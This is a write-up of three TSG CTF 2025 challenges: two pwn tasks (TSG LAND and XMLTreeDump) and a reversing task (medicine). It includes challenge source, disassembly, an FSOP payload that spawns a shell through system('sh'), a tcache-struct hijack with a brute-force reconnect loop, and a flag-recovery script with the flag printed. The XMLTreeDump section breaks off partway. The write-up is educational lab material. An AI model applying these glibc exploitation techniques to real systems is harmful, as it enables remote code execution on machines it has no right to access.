TSG CTF 2025 Writeups

index

pwn - TSG LAND

we get a binary named chall :

tlsbollei@tlsbollei mnt/.../tsg-land file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e827c4b6e83ca9168be9be90f2a3d2d62dc62b49, not stripped
tlsbollei@tlsbollei mnt/.../tsg-land checksec chall
[*] '/mnt/c/Users/tlsbo/Downloads/tsg-land/tsg-land/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    RUNPATH:    b'.'
    Stripped:   No
tlsbollei@tlsbollei mnt/.../tsg-land

source code is as follows :

1
#include <setjmp.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <string.h>
5
#include <time.h>
6

7
jmp_buf env[5];
8
int launched[5];
9

10
void init() {
11
    setvbuf(stdout, NULL, _IONBF, 0);
12
}
13

14
int read_int(char *prompt) {
15
    int x;
16
    printf("%s > ", prompt);
17
    scanf("%d", &x);
18
    for (;getchar() != '\n';);
19
    return x;
20
}
21

22
void notepad() {
23
    void *_[99]; // padding
24
    char *buf = malloc(0x1000);
25
    if (buf == NULL) {
26
        return;
27
    }
28
    if (setjmp(env[1]) != 0) {
29
        printf("saved content: %s\n", buf);
30
    }
31
    for (;;) {
32
        int q = read_int("1: edit, 0: save and quit");
33
        if (q == 0) {
34
            longjmp(env[0], 1);
35
        } else {
36
            printf("enter the content > ");
37
            fgets(buf, 0x1000, stdin);
38
        }
39
    }
40
}
41

42
void pwquiz() {
43
    void *_[100]; // padding
44
    char *hints[3] = {
45
        "Hint 1: an English word",
46
        "Hint 2: length is 8",
47
        "Hint 3: the most used password in the world"
48
    };
49

50
    setjmp(env[2]);
51

52
    for (;;) {
53
        int q = read_int("1~3: hint, 4: answer, 0: quit");
54
        if (q == 0) {
55
            longjmp(env[0], 1);
56
        } else if (1 <= q && q <= 3) {
57
            printf("%s\n", hints[q-1]);
58
        } else if (q == 4) {
59
            char buf[16];
60
            printf("answer > ");
61
            scanf("%15s", buf);
62
            if (strcmp("password", buf) == 0) {
63
                puts("Congraturations!!!");
64
                longjmp(env[0], 123456);
65
            } else {
66
                puts("...");
67
            }
68
        }
69
    }
70
}
71

72
struct board {
73
    int board[16];
74
    int sx;
75
    int sy;
76
};
77

78
void move(struct board *b, char m) {
79
    if (b->sx < 0 || 3 < b->sx || b->sy < 0 || 3 < b->sy) {
80
        return;
81
    }
82
    switch (m) { // left, down, up, right
83
        case 'a': // left
84
            if (b->sx < 3) {
85
                b->board[b->sy*4 + b->sx] = b->board[b->sy*4 + b->sx + 1];
86
                b->sx++;
87
            }
88
            break;
89
        case's': // down
90
            if (b->sy > 0) {
91
                b->board[b->sy*4 + b->sx] = b->board[(b->sy-1)*4 + b->sx];
92
                b->sy--;
93
            }
94
            break;
95
        case 'w': // up
96
            if (b->sy < 3) {
97
                b->board[b->sy*4 + b->sx] = b->board[(b->sy+1)*4 + b->sx];
98
                b->sy++;
99
            }
100
            break;
101
        case 'd': // right
102
            if (b->sx > 0) {
103
                b->board[b->sy*4 + b->sx] = b->board[b->sy*4 + b->sx - 1];
104
                b->sx--;
105
            }
106
            break;
107
        default:
108
            break;
109
    }
110
}
111

112
void print_board(struct board *b) {
113
    for (int i = 0; i < 4; i++) {
114
        for (int j = 0; j < 4; j++) {
115
            if (i == b->sy && j == b->sx) {
116
                printf("[] ");
117
            } else {
118
                printf("%02d ", b->board[i*4+j]);
119
            }
120
        }
121
        puts("");
122
    }
123
}
124

125
int judge(struct board *b) {
126
    for (int i = 0; i < 15; i++) {
127
        if (b->board[i] != i) {
128
            return 0;
129
        }
130
    }
131
    return 1;
132
}
133

134
void slide_puzzle() {
135
    srand(time(NULL));
136
    void *_[100]; // padding
137
    struct board b = {{}, 3, 3};
138
    for (int i = 0; i < 16; i++) {
139
        b.board[i] = i;
140
    }
141

142
    // randomize board
143
    for (int i = 0; i < 100; i++) {
144
         move(&b, "aswd"[rand()%4]);
145
    }
146

147
    // move space to bottom-right
148
    move(&b, 'a');
149
    move(&b, 'a');
150
    move(&b, 'a');
151
    move(&b, 'w');
152
    move(&b, 'w');
153
    move(&b, 'w');
154

155
    setjmp(env[3]);
156

157
    for (;;) {
158
        print_board(&b);
159
        printf("a: left, s: down, w: up, d: right, q: save and quit > ");
160
        char c = getchar();
161
        if (c == 'q') {
162
            longjmp(env[0], 1);
163
        } else if (c != '\n') {
164
            move(&b, c);
165
            if (judge(&b)) {
166
                print_board(&b);
167
                puts("Congraturations!");
168
                launched[3] = 0;
169
                longjmp(env[0], 1);
170
            }
171
        }
172
    }
173
}
174

175
void int_float_translater() {
176
    void *_[94]; // padding
177
    unsigned long num;
178
    char *__ = alloca(100); // padding 2
179

180
    setjmp(env[4]);
181

182
    for (;;) {
183
        int q = read_int("1: uint64 to float64, 2: float64 to uint64, 0: quit");
184
        switch (q) {
185
            case 1:
186
                printf("num(uint64) > ");
187
                scanf("%ld", &num);
188
                for (;getchar() != '\n';);
189
                printf("%1$ld = %2$f = %2$e\n", num, *(double *)&num);
190
                break;
191
            case 2:
192
                printf("num(float64) > ");
193
                scanf("%lf", (double *)&num);
194
                for (;getchar() != '\n';);
195
                printf("%1$f = %2$ld = 0x%2$lx\n", *(double *)&num, num);
196
                break;
197
            case 0:
198
                longjmp(env[0], 1);
199
            default:
200
                break;
201
        }
202
    }
203
}
204

205
void *apps[5] = {NULL, notepad, pwquiz, slide_puzzle, int_float_translater};
206

207
void print_desktop() {
208
    puts("...");
209
    puts("1: notepad.exe");
210
    puts("2: password ate quiz ~returns~");
211
    puts("3: 4x4 slide puzzle");
212
    puts("4: int float translater");
213
    puts("0: exit TSG LAND");
214
}
215

216
int main() {
217
    init();
218
    puts("Welcome to TSG LAND!!!");
219
    int res = setjmp(env[0]);
220
    if (res == 123456) {
221
        puts("You are pw-ate-quiz m@ster!");
222
    } else if (res != 0) {
223
        puts("Welcome back!");
224
    }
225

226
    for (;;) {
227
        print_desktop();
228
        int q = read_int("May I help you?");
229
        if (q <= -1 || 5 <= q) {
230
            puts("invalid command");
231
        } else if (q == 0) {
232
            puts("bye");
233
            exit(0);
234
        } else {
235
            if (launched[q]) {
236
                longjmp(env[q], 1);
237
            } else {
238
                launched[q] = 1;
239
                ((void(*)())apps[q])();
240
            }
241
        }
242
    }
243
}

The bug we hold onto

The bug is longjmp into a dead stack frame. main() saves env[0] with _setjmp, then later resumes apps by longjmp(env[q], 1) if they were launched before.

1
1cc7: lea env(%rip),%rax
2
1cd1: call 1080 <_setjmp@plt>   # save env[0] here
3
1d7c: test %eax,%eax
4
1d7e: []                       # if launched[q] != 0
5
1da7: mov $0x1,%esi
6
1dac: mov %rax,%rdi             # rdi = &env[q]
7
1daf: call 10e0 <longjmp@plt>    # jump back into app

These apps don’t return normally, they quit using longjmp(env[0], 1). The lack of a traditional return means that their stack frames are no longer a valid call chain, despite this later on main jumps back inside of them, so this is a stack ressurection vulnerability.

Defeating PIE using print leaks

So, what can we use our stack ressurection vulnerability for? Simply said, because different functions overlap the same dead stack frame, we can corrupt local variables. You can immediately notice what local variable we can corrupt to get an arbitrary read plus write, but I’ll get to that later. Firstly, we need to defeat PIE by getting a leak.

We notice a key observation and that is that pwquiz stores rodata pointers on its stack

1
13b1: lea 0x2053(%rip),%rax   # hint 1
2
13b8: mov %rax,-0x340(%rbp)
3

4
13bf: lea 0x206b(%rip),%rax   # hint 2
5
13c6: mov %rax,-0x338(%rbp)
6

7
13cd: lea 0x2080(%rip),%rax   # hint 3
8
13d4: mov %rax,-0x330(%rbp)

dumping .rodata really confirms our finding :

1
2080: "Hint 3: the most used password in the world\0"

Second key observation is that slide_puzzle’s board starts at the exact same stack offset, which beautifully complements our initial hypothesis. In slide_puzzle, we can see that the board struct lives at rbp-0x330

1
18f6: lea -0x330(%rbp),%rax
2
19a5: mov %rax,%rdi
3
19a8: call 1713 <print_board> # prints b.board[] as ints

we can finalize:

pwquiz local -0x330(%rbp) contains the 64-bit pointer PIE_base + 0x2080 slide_puzzle local b.board[0] is the first 4 bytes at rbp-0x330 slide_puzzle b.board[1] is the next 4 bytes at rbp-0x32c

and so because of our stack ressurection bug, after running pwquiz() and then resuming slide_puzzle() via longjmp(env[3],1), the memory at rbp-0x330 is no longer the puzzle tiles, it is whatever pwquiz left there.

What to do with this information?

Because print_board prints each element as an int

1
1778: mov (%rax,%rdx,4),%eax   # load b->board[idx]
2
178c: call 1050 <printf@plt>   # "%02d"

We can exploit this as follows :

1
leak = (board[0][1] << 32) | board[0][0]
2
baseaddr = leak - 0x2080

this works because leak == PIE_base + 0x2080 (the address of our third hint), and you subtract the known rodata offset 0x2080 to get the PIE base. that is also why the constant is exactly 0x2080, it is not random, it is the rodata symbol that pwquiz leaves behind at the exact overlapping stack slot.

translator + puzzle moves becomes our write primitive

we can use the 4x4 puzzle as a 32bit shuffler. this is because the move() function literally copies ints around and does:

1
...load neighbor int..
2
15ad: movslq %esi,%rdx
3
15b0: mov %ecx,(%rax,%rdx,4)   # neighbor write to blank slot

so each move does not “swap tiles”, instead, it copies an int from a neighbor into the blank position and updates sx/sy. this means we can route specific 32 bit values through the grid with a known path, but still not yet.

how translator steps in our equation

translator scans into a local 64-bit num at rbp-0x310

1
1b64: lea -0x310(%rbp),%rax
2
1b78: call __isoc99_scanf@plt   # scanf("%ld", &num) from oru source

translator lets you place 8 controlled bytes onto its stack frame. with the stack resurrection bug, those bytes land inside other app locals. here is a holy shit moment :

slide_puzzle board base: rbp-0x330, and notepad pointer buf lives at rbp-0x328. that means the notepad pointer overlaps puzzle elements board[2] and board[3]. and we can see in the source.. printf("%s", buf), fgets(buf, 0x1000, stdin). this gives us an arbitrary read AND write!

notepad magic

confirming our logic above:

1
12d2: call malloc@plt
2
12d7: mov %rax,-0x328(%rbp)     # save buf pointer

and when we resume notepad using setjmp != 0, we do printf("%s", buf)

1
12f6: call _setjmp@plt          # env[1]
2
12fb: test %eax,%eax
3
12fd: je 131d
4
12ff: mov -0x328(%rbp),%rax     # load buf pointer
5
1309: lea 0x2011(%rip),%rdi     # "saved content: %s\n"
6
1318: call printf@plt

so if we corrupt this pointer at rbp-0x328, we can get an arbitrary read via %s, and our foreshadowed arbitrary write looks like this:

1
136a: mov -0x328(%rbp),%rax     # buf pointer
2
1371: mov $0x1000,%esi
3
1379: call fgets@plt            # writes our bytes to *buf, nice

Important (the game of the exploit)

the exploits entire game is: use translator + puzzle moves to rewrite notepad saved buf pointer, giving us AAR and AAW.

leaking the libc

we do :

1
translator(chall.got.puts & 0xffffffff)
2
puzzle('<>')
3
io.sendlineafter(b'? > ', b'1')
4
io.recvuntil(b'saved content: ')
5
libc.address = u64(io.recvline().strip().ljust(8, b'\x00')) - libc.sym.puts

we write only the low 32 bits of the desired pointer, which is the puts@GOT address. the high bits of the notepad buf pointer were originally a heap pointer like 0x00005555........ and PIE mappings are also typically 0x00005555........ locally/remote. so changing only the low dword often retargets the pointer from heap to PIE region. thats why we use & 0xffffffff.

notepad resumes
printf("%s", buf) reads bytes at puts@GOT
GOT holds the resolved libc address of puts
subtract libc.sym.puts and we get libc base

FSOP

now we want notepad, so the fgets, to write into libc stdout FILE object, which is at 0x7f........, not 0x00005555........, so we overwrite both halves

1
translator((_IO_2_1_stdout_ >> 32) & 0xffffffff)
2
translator(_IO_2_1_stdout_ & 0xffffffff)

after these two shuffles, notepad saved pointer becomes:

1
buf == libc.sym._IO_2_1_stdout_

so the fgets of notepad becomes a write directly into libc global stdout struct, which is exactly FSOP.

brain freeze

right. FSOP. but… wasnt that patched in like glibc ≥2.24/2.27? Checking the version of the handout libc shows:

tlsbollei@tlsbollei mnt/.../tsg-land strings libc.so.6 | grep "GNU C Library"
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.11) stable release version 2.35.
tlsbollei@tlsbollei mnt/.../tsg-land

2.35. Not good. After 25 minutes of staring into a wall, I realized that we can just use ideas that remain valid. As per vtable bypass articles,

Important (FILE structure exploitation)

You can not just point a FILEs vtable to an arbitrary fake jump table anymore, because glibc validates the vtable pointer is inside the read-only __libc_IO_vtables region (or it sends us to hell).

our exploit still works on glibc 2.35 because we do not rely on an arbitrary vtable anywhere, we can use two ideas that remain valid:

Pick a vtable that is already inside __libc_IO_vtables (so the check passes)
Pivot into wide-IO and hijack _wide_vtable, which historically is not validated by the same IO_validate_vtable() fast-path (House of Paper, wide FSOP style)

confirming write-what-where into stdout

notepad local pointer is stored at rbp-0x328 and used as the destination for fgets:

1
12d2: call   malloc@plt
2
12d7: mov    %rax,-0x328(%rbp)      ; save buf pointer
3

4
12ff: mov    -0x328(%rbp),%rax
5
1318: call   printf@plt              ; printf("saved content: %s\n", buf)
6

7
136a: mov    -0x328(%rbp),%rax
8
1379: call   fgets@plt               ; fgets(buf, 0x1000, stdin)

once the exploit corrupts that saved buf pointer to equal libc:_IO_2_1_stdout_, the line:

1
io.sendlineafter(b' > ', fs)

becomes fgets(stdout, aa), overwriting the real stdout FILE object in libc. additionally, after we return to the menu, the program immediately calls puts a bunch of times in print_desktop

1
1c53: call puts@plt
2
1c62: call puts@plt

so the program naturally triggers stdio after we corrupt stdout.

exploiting

final payload is > corrupt stdout so libc calls system.

1
shellpop = flat({
2
  0x00: b' sh\0...',
3
  0x88: p64(libc.address + 0x21ca60),         #  lock
4
  0xA0: p64(stdout+0xe0),                      # _wide_data
5
  0xC0: p32(-1),                               # _mode = -1 (wide)
6
  0xD8: _IO_wfile_jumps - 0x38 + 0x18,         # vtable (legit libc table)
7
  0xE0+0x68: p64(system),                      #  target
8
})

step by step:

1
0xA0: p64(stdout + 0xe0)

this matches _wide_data being a field in _IO_FILE (glibc struct layout) and is the classic setup for wide FSOP.

1
0xC0: p32(-1)    # _mode = -1

setting _mode negative pushes glibc down wide-character code paths (where _wide_data is used heavily).

1
0xD8: _IO_wfile_jumps - 0x38 + 0x18   # _IO_wfile_jumps - 0x20

this is our patched FSOP compatibility part, _IO_wfile_jumps is a real libc jump living in __libc_IO_vtables region, so we pass the vtable check, and the small subtraction is a common trick because the validator checks in range, and not exact symbol start.

1
0x88: p64(libc.address + 0x21ca60)

glibc may lock the stream, if _lock is garbage, we crash. so we give it a pointer to a valid lock object in libc.

wide-vtable pivot and why the patch does not save it

1
w_offset = 0xE0
2
w_offset+0x68: p64(system)
3
w_offset+0xE0: p64(stdout + 0xe0)

we place a wide_data object at stdout+0xe0 and at the end of that object, we set _wide_vtable = stdout+0xe0, so wide_vtable points into our own controlled memory. inside this fake vtable, at offset 0x68, we put the function pointer system. when libc takes a wide-IO path and does something like “call the wide overflow/put function via _wide_vtable”, it will fetch the pointer we planted and call it, which in our case, is system.

why system(“sh”) works even though the signature is bad

in these wide-vtable FSOP chains, the call site typically passes the FILE* as the first argument (in rdi on amd64). If we replace that target with system, then system(rdi) treats that FILE* pointer as a char*. so we put the cmd string at the start of the FILE object:

1
0x00: b' sh\0...',

when our corrupted code path calls our planted system, it becomes

1
system((char*)stdout)

and since stdout begins with "sh\0", we get a shell

The Game

rev - medicine

┌──(tlsbollei㉿tlsbollei)-[/mnt/c/Users/tlsbo/Downloads/medicine/medicine]
└─$ file medicine
medicine: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c540100314c537435ffa30d942a013f0f3bbde6a, for GNU/Linux 4.4.0, stripped

┌──(tlsbollei㉿tlsbollei)-[/mnt/c/Users/tlsbo/Downloads/medicine/medicine]
└─$ ./medicine
flag? flag{bbb}
Wrong ;(

input gate :

1
void __fastcall __noreturn main(int a1, char **a2, char **a3)
2
{
3
  char v3[40]; // [rsp+0h] [rbp-38h] BYREF
4
  unsigned __int64 v4; // [rsp+28h] [rbp-10h]
5

6
  v4 = __readfsqword(0x28u);
7
  printf("flag? ");
8
  if ( (unsigned int)__isoc23_scanf("%32s", v3) == 1 && strlen(v3) == 32 )
9
    BUG();
10
  sub_1200();
11
}

__isoc23_scanf("%32s", v3) and strlen(v3) == 32 which then branches into BUG() which is our protected/decrypted path. Failure path is sub_1200(), which looks as follows

1
void __noreturn sub_1200()
2
{
3
  _QWORD buf[3]; // [rsp+Eh] [rbp-1Ah] BYREF
4

5
  *(_QWORD *)((char *)&buf[1] + 2) = __readfsqword(0x28u);
6
  strcpy((char *)buf, "Wrong ;(\n");
7
  write(1, buf, 9u);
8
  _exit(1);
9
}

this fixed string and the function fixed address (.text+0x1200) are crucial for the offline recovery.

initialization of SIGILL handler

1
unsigned __int64 sub_132F()
2
{
3
  __int64 v0; // rax
4
  struct sigaction v2; // [rsp+0h] [rbp-A8h] BYREF
5
  unsigned __int64 v3; // [rsp+98h] [rbp-10h]
6

7
  v3 = __readfsqword(0x28u);
8
  setvbuf(stdin, 0, 2, 0);
9
  setvbuf(stdout, 0, 2, 0);
10
  setvbuf(stderr, 0, 2, 0);
11
  memset(&v2.sa_mask, 0, 0x90u);
12
  v2.sa_handler = (__sighandler_t)sub_12A4;
13
  v2.sa_flags = 4;
14
  sigemptyset(&v2.sa_mask);
15
  if ( sigaction(4, &v2, 0) )
16
    __assert_fail("sigaction(SIGILL, &action, NULL) == 0", "chal.c", 0x43u, "init");
17
  v0 = sysconf(30);
18
  if ( mprotect(
19
         (void *)((unsigned __int64)&loc_1500 & -v0),
20
         (-v0 & ((unsigned __int64)&loc_1500 + v0 + 1663)) - ((unsigned __int64)&loc_1500 & -v0),
21
         7) )
22
  {
23
    __assert_fail(
24
      "mprotect((void*)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC) == 0",
25
      "chal.c",
26
      0x49u,
27
      "init");
28
  }
29
  return v3 - __readfsqword(0x28u);
30
}

SIGILL handler is installed via v2.sa_handler = (__sighandler_t)sub_12A4; and sigaction(4, &v2, 0)), and the code page containing loc_1500 is made RWX with mprotect with flag 7, with the protected tail size being bounded explicitly by 1663. This is our self modifying region.

ROT13 routine

in sub_126A we cab see the raw decomp of the rot13 routine:

1
__int64 __fastcall sub_126A(_BYTE *a1)
2
{
3
  __int64 result; // rax
4

5
  for ( result = (unsigned __int8)*a1; (_BYTE)result; result = (unsigned __int8)*a1 )
6
  {
7
    if ( (unsigned __int8)((result & 0xDF) - 65) <= 0x19u )
8
    {
9
      if ( (unsigned __int8)(result - 78) <= 0xCu || (char)result > 109 )
10
        *a1 = result - 13;
11
      else
12
        *a1 = result + 13;
13
    }
14
    ++a1;
15
  }
16
  return result;
17
}

important is the alpha range check ((result & 0xDF) - 65) <= 0x19u and the *a1 = result - 13; else; *a1 = result + 13; transform on the a1 pointer

SIGILL handler and decrypting per fault

1
__int16 __fastcall sub_12A4(__int64 a1, __int64 a2, _QWORD *a3)
2
{
3
  _WORD *v3; // rbx
4
  char *v5; // r12
5
  _WORD *v6; // rdx
6
  char *v7; // rcx
7
  __int16 result; // ax
8

9
  v3 = (_WORD *)a3[21];
10
  if ( ((unsigned __int8)v3 & 0x3F) != 0 || (_WORD *)qword_40B0 == v3 )
11
    sub_1200();
12
  v5 = (char *)a3[20];
13
  qword_40B0 = a3[21];
14
  sub_126A(v5);
15
  v6 = v3;
16
  v7 = v5;
17
  do
18
  {
19
    result = 3525 * *v7 + 15842;
20
    *v6++ ^= result;
21
    ++v7;
22
  }
23
  while ( v7 != v5 + 32 );
24
  ++a3[19];
25
  return result;
26
}

this confirms a variety of my troubles == ((unsigned __int8)v3 & 0x3F) != 0 enforces 64 byte alignment, qword_40B0 == v3 prevents repeating the same block, sub_126A(v5); runs on every SIGILL to ROT13 toggles each time, and the loop runs 32 iterations, with each iteration XORing one _WORD == 32 x 2 bytes == 64 bytes decrypted the mask function is mask16 = (3525 * keyByte + 15842) mod 2^16

TL;DR in case of confusion

this binary implements a “decrypt-on-fault” scheme that uses CPU faults to progressively decrypt its own code. the program reads exactly 32 bytes from the user (the “flag”). If it’s not exactly 32 bytes, it exits immediately with “Wrong ;(\n”. during initialization, the binary installs a custom signal handler for SIGILL (Signal 4, illegal instruction). it also makes a region of code RWX using mprotect. a 1663-byte encrypted tail sits in the .text section starting at address loc_1500, filled with invalid instructions (UD2 = 0F 0B). as the program continues runtime execution, it executes an invalid instruction (SIGILL) which forces the signal handler dispatcher to decrypt exactly 64 bytes of ciphertext code in place using the user key, which is our 32 byte flag input, and execution resumes from our newly decrypted code. given we provide the binary with the correct flag, this process is repeated until we successfuly decrypt all of the invalid instructions into valid ones, and we reach the point in the binary where our flag is confirmed to be correct.

offline recovery and how to solve?

call sub_1200 becomes a perfect proxy for us, and that is because a call rel32 instruction is encoded as E8 plus 4 byte little endian displacement, where displacement = target - (callsite + 5). in our binary, sub_1200 is at .text+0x1200. therefore, for any candidate callsite address p, the plaintext bytes are fully determined. this is because encryption is XOR on 16 bit words :

cipherWord = plainWord XOR mask16 ==> mask16 = cipherWord XOR plainWord

and mask16 must equal (3525*keyByte + 15842) & 0xFFF for some byte.

inverting mask16 to keyByte

we precompute a reverse table for all 256 bytes:

1
mask16(b) = (3525*b + 15842) & 0xFFFF
2
rev[mask16(b)] = b

from the handler,

1
sub_126A(v5);

since ROT13 is an involution (a function, transformation, or operator that is equal to its inverse, i.e. which gives the identity when applied to itself.), the key alternates per decrypted block:

block0 uses rot13(flag) block1 uses flag block2 uses rot13(flag)

therefore, once we recover the used byte for an even block, we ROT13 it back to get the real flag byte

dumping the encrypted tail

because of LOAD mapping, (Offset=VirtAddr for .text segment), the encrypted page starts at loc_1500, which is file offset 0x1500. The RWX page is 0x100..0x1FFF, and the protected tail spans roughly 0x1500..0x1500+1663.

dd if=./medicine of=tailpage.bin bs=1 skip=$((0x1500)) count=$((0x2000-0x1500)) status=none

and here we have our solve

1
#!/usr/bin/env python3
2
from pathlib import Path
3
from collections import Counter
4

5
A = 3525
6
B = 15842
7

8
data = Path("medicine").read_bytes()
9

10
mask_to_key = {}
11
for key_byte in range(256):
12
    mask = (A * key_byte + B) & 0xFFFF
13
    mask_to_key[mask] = key_byte
14

15
def rot13(ch):
16
    if 65 <= ch <= 90:
17
        ch = ((ch - 65 + 13) % 26) + 65
18
    elif 97 <= ch <= 122:
19
        ch = ((ch - 97 + 13) % 26) + 97
20
    return ch
21

22
votes = [Counter() for _ in range(32)]
23

24
for callsite in range(0x1500, 0x2000 - 5):
25
    disp = (0x1200 - (callsite + 5)) & 0xFFFFFFFF
26
    call_plain = bytes([0xE8]) + disp.to_bytes(4, 'little')
27

28
    block_base = callsite & ~0x3F
29
    block_idx = (block_base - 0x1500) // 64
30
    is_even_block = (block_idx % 2 == 0)
31

32
    recovered = {}
33
    for word_idx in range(32):
34
        word_addr = block_base + 2 * word_idx
35

36
        if word_addr >= callsite and word_addr + 1 < callsite + 5:
37
            offset_in_call = word_addr - callsite
38

39
            b0 = call_plain[offset_in_call]
40
            b1 = call_plain[offset_in_call + 1]
41
            plain_word = b0 | (b1 << 8)
42

43
            cipher_word = int.from_bytes(data[word_addr:word_addr+2], 'little')
44

45
            mask = cipher_word ^ plain_word
46

47
            if mask in mask_to_key:
48
                key_byte = mask_to_key[mask]
49

50
                if is_even_block:
51
                    flag_byte = rot13(key_byte)
52
                else:
53
                    flag_byte = key_byte
54

55
                if 32 <= flag_byte <= 126:
56
                    recovered[word_idx] = flag_byte
57

58
    if recovered:
59
        for idx, val in recovered.items():
60
            votes[idx][val] += len(recovered)
61

62
result = bytearray(32)
63
result[0:5] = b"TSGCT"
64

65
for i in range(5, 32):
66
    if votes[i]:
67
        result[i] = votes[i].most_common(1)[0][0]
68
    else:
69
        result[i] = ord('?')
70

71
print(result.decode())

TSGCTF{51gn4l_h4ndl3r_r0t13_x0r}

pwn - XMLTreeDump

tlsbollei@tlsbollei mnt/.../XMLTreeDump pwn checksec XMLTreeDump
[*] '/mnt/c/Users/tlsbo/Downloads/XMLTreeDump/XMLTreeDump/XMLTreeDump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
tlsbollei@tlsbollei mnt/.../XMLTreeDump

root bug, xml_decl_loc becomes a dangling pointer, then delete() frees garbage

in XmlParser::parse_xml_decl(), the program creates a local XmlDecl xml_decl; and pushes it into:

1
std::vector<std::variant<XmlNode, XmlDecl>> originals;
2
originals.push_back(std::move(xml_decl));
3
return std::get<XmlDecl>(originals.back());

so it returns a reference to the XmlDecl object stored inside originals. in XmlParser::parse_element() when encountering <?xml?> shows the exact same dangerous sequence : if we see <?xml:, if this->xml_decl_loc exists, they destroy+free it operator delete(x, 0x40), then set it to &parse_xml_decl()

therefore,

1
if (this->xml_decl_loc) delete this->xml_decl_loc;   // <-- delete pointer into originals storage
2
this->xml_decl_loc = &parse_xml_decl();              // <-- pointer into originals buffer

why the pointer becomes dangling

in the constructor:

1
originals.reserve(10);

also in parse_element()

1
if (node.name == "root") originals.push_back(node);

therefore by nesting/creating enough <root>xyz</root> tags, you force originals to exceed capacity 10 ==> vector reallocates ==> the old buffer is freed ==> all references into it (including xml_decl_loc) become dangling.

then the next <?xml ...?> executes delete xml_decl_loc on a stale pointer into freed memory, which is our exploit entry.

what primitive is this

definitely not a free(anything) primitive, but it is still a strong one in our case, as we can make delete(xml_decl_loc) call free() on an address that used to be inside a freed vector buffer. with heap feng shui (grooming), we can make that stale pointer line up with a real malloc chunk user pointer we care about. therefore, the intended target is tcache_perthread_struct

free tcache_perthread_struct

what is tcache_perthread_struct

in glibc 2.3x, simplified :

1
struct tcache_perthread_struct {
2
  uint16_t counts[TCACHE_MAX_BINS];   // 64 * 2 = 0x80
3
  void*    entries[TCACHE_MAX_BINS];  // 64 * 8 = 0x200
4
};                                     // total = 0x280 (640)

the total number 0x280 is our gate in, we can build a blob and assert :

1
assert(len(payload_rop) == 640)

so our exploit plan is to use the UAF delete(xml_decl_loc) to free the live tcache struct chunk, immediately allocate exactly the same size to reclaim it and overwrite counts[] and entries[], so now we control the allocators per-thread cache.

big problem - no leak

we do not have a heap leak, which is a problem. we need to get the stale pointer used by delete(xml_decl_loc) to land exactly on the tcache struct chunk, which is ASLR/alignment lottery. because modern libc does safe-linking as follows,

1
stored_pointer = actual_pointer ^ (chunk_address >> 12)

which removes the last 12 bits, keeps only the identity bits of the heap base, these shifted bits act as an obsfuscation key.

the 12-bit lottery

we control the relative positions of the allocations within the heap, the timing of whe they get allocated/freed, and the sizes of our allocations. we do not know the absolute heap base. you may ask - PIE is off according to checksec, why are we bruteforcing anything? this is because the brute force isn’t about finding addresses - it’s about making a heap collision happen.

the collision requirement

for the exploit to work, we need

1
dangling_xml_decl_loc == tcache_struct_address
2

3
More specifically, we need the last 12 bits of both addresses to match, because tcache_perthread_struct lives at:
4

5
heap_base + small_offset
6
└───┬───┘   └────┬────┘
7
 unknown    controllable
8
 (ASLR)     (feng shui)

the small_offset part (last 12 bits) we can influence through allocation order/sizes, which as we have clarified, we control.

memory alignment constraints

heap memory is allocated in pages (4KB = 0x1000 bytes).

1
addresses end in: ...000, ...1000, ...2000, ...3000, and more
2
                   └─┬─┘
3
                    These 12 bits (0x000 to 0xFFF) define position within a 4KB window
4

5
malloc chunks are 16-byte aligned
6
Addresses end in: ...00, ...10, ...20, ...30, ...40, and more
7
                      └┬┘
8
                      last 4 bits are also constrained

when we do not know the heap base:

1
Heap could be at: 0x5555_0000_0000
2
              or: 0x5555_0000_1000
3
              or: 0x5555_0000_2000
4
              or: 0x5555_0000_3000
5
              or: 0x5555_0FFF_F000

but within each 4kb page, the relative layout is the same.

if our heap feng shui makes:

dangling_xml_decl_loc end with ..5d0
tcache_struct should be at heap_base + 0x2d0

then we need: heap_base & 0xFFF == 0x300

the last 12 bits of heap_base must be 0x300
there are 2^12 = 4096 possible values for these 12 bits
So 1/4096 chance of success per attempt

and that is exactly what we do, just spam the shit ouf the service ☜(⌒▽⌒)☞

1
while True:
2
  try:
3
    io = remote(...)
4
    io.send(payload)
5
    io.recvuntil("flag", timeout=0.1)
6
    break
7
  except:
8
    count += 1

when we win the lottery, delete(xml_decl_loc) frees the real tcache struct chunk.

reclaim the freed tcache struct and overwrite it (controlled tcache)

this is where we use a payload rop. the first 0x80 bytes should be counts[] (uint16), because setting many counts to 1 means “pretend these bins are non empty”. the following 0x200 bytes should be entries[], where we plant pointers for bins we want to malloc() to return. once we reclaim the freed tcache struct with an allocation of the right size, we overwrite:

1
tcache->counts[bin] = 1
2
tcache->entries[bin] = <address we want malloc to give us>

now we can make malloc(size_class(bin)) return a pointer anywhere we choose, as long as we satisfy safe-linking expectations for the next pointer when that chunk is popped.

turn controlled tcache into malloc returning .bss and then malloc returning .got.plt

because of safe-linking, we typically make malloc return a writable staging area .bss where we can build a fake tcache entry, use that staged fake entry so the next allocation returns the real target .got.plt, which we implement as follows:

1
mangle = 0x5f6
2
fake_chunks2 = flat({
3
  0x20: target^mangle
4
})

for tcache singly-linked lists, the next pointer stored in a freed chunk is mangled:

1
stored=next⊕(chunk_addr≫12)

so if we want the allocator to interpret a fake chunk at address CHUNK whose next should be TARGET, we write:

1
*(uint64_t*)CHUNK = TARGET ^ (CHUNK >> 12);

so in our exploit:

1
CHUNK is something like 0x5f65d0 (in .bss)
2
CHUNK >> 12 = 0x5f6 ==> which is our mangle
3
TARGET is .got.plt+offset (like 0x5f3010)

so:

1
target = 0x5f3010
2
mangle = 0x5f6
3
fd = target ^ mangle

how does “controlled allocation to GOT” work

after we corrupt tcache, the flow looks as follows:

1
1. Allocate ==> returns CHUNK ==> 0x5f65d0 (a chunk in .bss)
2
